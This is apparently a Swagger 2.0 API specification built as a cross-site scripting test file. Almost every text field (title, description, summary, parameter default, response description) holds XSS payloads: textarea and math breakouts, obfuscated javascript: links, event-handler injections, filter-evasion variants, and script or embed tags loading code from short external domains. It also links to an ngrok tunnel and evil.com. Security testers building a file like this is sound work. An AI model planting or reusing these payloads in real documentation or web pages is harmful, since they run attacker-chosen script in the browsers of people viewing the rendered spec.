swagger: "2.0"
info:
  title: <math><mtext><textarea><a title="</textarea><img src=x onerror=alert(document.domain)>">  
    
  version: "1.0.0"
  description: >
    <math><mtext><textarea><a title="</textarea><img src=x onerror=alert(document.domain)>">  
    <a href="https://1c59-182-48-212-56.ngrok-free.app" target="_blank">Click</a>
    <a href="https://1c59-182-48-212-56.ngrok-free.app/Desktop/xss2.html" target="_blank">Click2</a>
    <a href="https://evil.com" target="_blank" rel="noopener noreferrer">Click me</a>
    <A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
    <d3"<"/onclick="1>[confirm``]"<">z
    <d3/onmouseenter=[2].find(confirm)>z
    <details open ontoggle=confirm()>
    <script y="><">/*<script* */prompt()</script
    <w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
    <a href="javascript%26colon;alert(1)">click
    <a href=javas&#99;ript:alert(1)>click
    <script/"<a"/src=data:=".<a,[8].some(confirm)>
    <svg/x=">"/onload=confirm()//
    <--`<img/src=` onerror=confirm``> --!>
    <svg%0Aonload=%09((pro\u006dpt))()//
    <sCript x>(((confirm)))``</scRipt x>
    <svg </onload ="1> (_=prompt,_(1)) "">
    <!--><script src=//14.rs>
    <embed src=//14.rs>
    <script x=">" src=//15.rs></script>
    <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
    <iframe/src \/\/onload = prompt(1)
    <x oncut=alert()>x
    <svg onload=write()>

host: "api.test.com"
basePath: "/"
schemes:
  - http

paths:
  /xss:
    get:
      summary: >
        <script>alert(4)</script>
      description: >
        <div style="background:red" onclick="alert('div XSS')">Click div</div>
        <script>alert(4)</script>
      parameters:
        - name: xssParam
          in: query
          required: false
          type: string
          default: >
            <input autofocus onfocus="alert('XSS Input')">
            <script>alert(4)</script>
      responses:
        200:
          description: >
            <form><input type="submit" formaction="javascript:alert('XSS in Form')"></form>
            <script>alert(4)</script>
            <button onclick=alert(1)>XX</button>
